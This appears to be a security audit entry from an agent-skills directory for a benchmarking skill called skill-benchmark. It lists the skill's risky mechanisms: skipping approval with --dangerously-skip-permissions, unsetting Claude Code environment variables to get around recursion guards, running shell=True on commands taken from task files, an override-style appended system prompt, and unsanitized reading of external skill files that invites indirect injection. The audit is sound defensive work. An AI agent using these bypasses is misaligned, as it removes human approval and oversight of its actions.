The Agent Skills Directory

[COMMAND_EXECUTION]: The skill executes sub-sessions using claude -p with the --dangerously-skip-permissions flag in SKILL.md and agents/runner.md. This bypasses the platform's standard requirement for human approval of tool use, allowing the sub-agent to perform file operations and shell commands autonomously.
[COMMAND_EXECUTION]: In agents/runner.md, the skill explicitly unsets protection environment variables (env -u CLAUDECODE -u CLAUDE_CODE_ENTRYPOINT) to bypass restrictions intended to prevent infinite agent recursion and uncontrolled execution chains.
[REMOTE_CODE_EXECUTION]: The scripts/run_checks.py script uses subprocess.run(cmd, shell=True) to execute arbitrary shell commands extracted from the runs_without_error section of benchmark task markdown files. This creates a significant execution surface for arbitrary commands if the task definition files are manipulated or incorrectly generated.
[PROMPT_INJECTION]: The skill utilizes a system prompt append technique (--append-system-prompt) in agents/runner.md to force sub-sessions to load the skill under test. While intended for methodology consistency, the specific instruction pattern used ('IMPORTANT: Before starting any work, you MUST...') mimics common prompt injection override tactics.
[INDIRECT_PROMPT_INJECTION]: The skill is susceptible to indirect injection because it reads and analyzes the full content of external SKILL.md files to generate its own benchmarking tasks.
Ingestion points: In SKILL.md Step 2, the agent reads the complete target skill file to extract domains and capabilities.
Boundary markers: There are no boundary markers or instructions to ignore embedded commands when processing the target skill's content.
Capability inventory: The skill has access to Bash (read/write/execute), Agent tool (launching graders), and the ability to run unrestricted sub-sessions via claude -p.
Sanitization: The skill does not sanitize or validate instructions extracted from the target skill before using them to auto-generate tasks, potentially allowing a malicious skill to influence the benchmark generator.
[DYNAMIC_EXECUTION]: The benchmarking process involves dynamic generation of task files in Step 3 which are then processed by execution and grading scripts, creating multiple points where instructions from data are converted into executable actions.

skill-benchmark